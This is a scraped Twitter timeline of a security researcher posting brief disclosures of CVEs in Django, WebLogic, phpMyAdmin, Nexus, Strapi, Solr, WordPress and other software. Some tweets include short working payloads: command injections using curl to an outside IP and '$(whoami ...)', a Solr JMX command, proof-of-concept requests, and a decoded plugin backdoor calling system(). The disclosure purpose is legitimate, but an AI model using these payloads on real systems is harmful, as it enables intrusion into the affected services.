Tweets

You blocked @chybeta

Are you sure you want to view these Tweets? Viewing Tweets won't unblock @chybeta

  1. 24 minutes ago

    CVE-2020-7471: SQLI in Django: django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter. FIX:

    Undo
  2. Jan 16

    CVE-2020-2551 WebLogic RCE via IIOP protocol.

    Undo
  3. Jan 14

    CVE-2020-5504 SQLI in phpMyAdmin: A malicious user could inject custom SQL in place of their own username when creating queries to this page fix:

    Undo
  4. Jan 10

    find a "new" way to get JDBC Deserialization RCE and it doesn't need any interceptor .

    Undo
  5. Jan 2
    Undo
  6. Jan 2

    CVE-2019-10758 post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that uses the `toBSON` method however there are lots of no-auth mongo-express ... shodan: poc:

    Undo
  7. 29 Dec 2019

    Apereo Cas 4.2.X Remote Code Execution.(execution =xxx_ZXlKaGJH...):GIF👇 and about the Apereo Cas 4.1.X Remote Code Execution.(execution =xxx_AAAAIg...): Thanks

    Undo
  8. 10 Dec 2019
    Undo
  9. 9 Dec 2019

    CVE-2019-15588 OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475) "createrepo" / "mergerepo" => /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo CVE-2019-15588 CVE-2019-5475

    Undo
  10. 5 Dec 2019

    CVE-2019-19609 Strapi Framework Post-Auth RCE curl -H $'Authorization: Bearer [jwt]' ... --data {"plugin": "documentation && $(whoami > /tmp/whoami)","port":"1337"}

    Undo
  11. 3 Dec 2019

    CVE-2019-3990 User Enumeration Vulnerability GET /api/users/search?email=.com => {"code":400,"message":"username is required"} GET /api/users/search?username=t => User Enumeration

    Undo
  12. 3 Dec 2019

    Harbor Security Update: 1. Privilege Escalation 2. CVE-2019-19029 SQL Injection via user-groups 3. CVE-2019-19026 SQL Injection via project quotas 4. CVE-2019-19025 Missing CSRF protection 5. CVE-2019-3990 User Enumeration Vulnerability

    Undo
  13. 3 Dec 2019

    CVE-2019-5096 GoAhead web server code execution vulnerability : An exploitable code execution vulnerability exists in the processing of multi-part/form-data requests within the base GoAhead web server application in versions v5.0.1, v.4.1.1 and v3.6.5.

    Undo
  14. 2 Dec 2019
    Undo
  15. 25 Nov 2019

    CVE-2019-19268 rConfig 3.9.2 Local Privilege Escalation: CVE-2019-19268 + CVE-2019-16663 / CVE-2019-16662 = Full ROOT ACCESS about CVE-2019-16663 / CVE-2019-16662

    Undo
  16. 24 Nov 2019

    CVE-2019-18622 SQLI in phpMyAdmin: A vulnerability was reported where a specially crafted database name can be used to trigger an SQL injection attack through the designer feature.

    Undo
  17. 18 Nov 2019

    CVE-2019-12409: Apache Solr RCE vulnerability due to bad config default (JMX ) jython xxx 18983 command super_secret "ls -la"

    Undo
  18. 17 Nov 2019

    backdoor in fake super socialat plugin(/wp-content/plugins/super-socialat/super_socialat.php) base64_decode("c3lzdGVtKCJ3aG9hbWkiKTs=") => system("whoami");

    Undo
  19. Retweeted
    5 Nov 2019

    I get asked how I manage a full time job, content, steam, hacking on top of my personal life. I’m going to answer this once and only once: if you have time to waste on YouTube/Reddit you have time to learn how to hack. I go to bed an hour later and wake up an hour earlier

    Show this thread
    Undo
  20. 30 Oct 2019

    WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts POC: GET /wordpress/?static=1&order=asc Fix: Remove the static query property Analsyis:

    Undo

Loading seems to be taking a while.

Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.

    You may also like

    ·